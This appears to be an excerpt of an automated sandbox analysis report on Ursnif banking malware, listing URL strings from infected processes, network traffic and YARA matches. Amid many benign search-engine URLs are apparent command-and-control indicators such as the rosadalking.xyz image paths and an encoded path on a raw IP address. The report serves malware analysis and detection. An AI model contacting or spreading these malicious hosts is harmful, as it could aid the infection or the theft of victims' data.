Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 5fd9d7ec9e7aetar.dll, String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 5fd9d7ec9e7aetar.dll, String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 00000025.00000002.641097110.0000000003767000.00000004.00000001.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?aa4ec0d4b8242
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp, String found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: ~DF224E930954C99BCE.TMP.4.dr, {CB1D97FB-3FD1-11EB-90E5-ECF4BB570DC9}.dat.4.drString found in binary or memory: http://firestore.googleapis.com/images/5gl1_2BhlXsWr7coQSs/4F845jkaqRiUCXeQicZCJl/ANd4nGixTqMmg/W9Sd
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: 5fd9d7ec9e7aetar.dllString found in binary or memory: http://ocsp.sectigo.com0
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: imagestore.dat.21.drString found in binary or memory: http://rosadalking.xyz/favicon.ico
            Source: imagestore.dat.21.drString found in binary or memory: http://rosadalking.xyz/favicon.ico~
            Source: {F0C73B59-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.drString found in binary or memory: http://rosadalking.xyz/images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDs
            Source: explorer.exe, 00000025.00000000.438799794.0000000001640000.00000002.00000001.sdmpString found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8
            Source: {F0C73B5B-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.drString found in binary or memory: http://rosadalking.xyz/images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9
            Source: loaddll32.exe, 00000000.00000003.375700561.00000000015B7000.00000004.00000001.sdmp, explorer.exe, 00000025.00000000.449476273.0000000005509000.00000004.00000001.sdmp, ~DF907A0632D9B8351A.TMP.21.dr, {F0C73B57-3FD1-11EB-90E5-ECF4BB570DC9}.dat.21.drString found in binary or memory: http://rosadalking.xyz/images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/x
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 0000001C.00000002.476825064.00000224909E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp | String found in binary or memory: https://185.156.172.54/images/TMwZ54mn/_2B0YUdRavAKwwypVOfrYnt/6W6xbFFdug/RuY3cr5ZWBeuRUS61/qsMNDxm8
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: 5fd9d7ec9e7aetar.dll | String found in binary or memory: https://sectigo.com/CPS0D
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
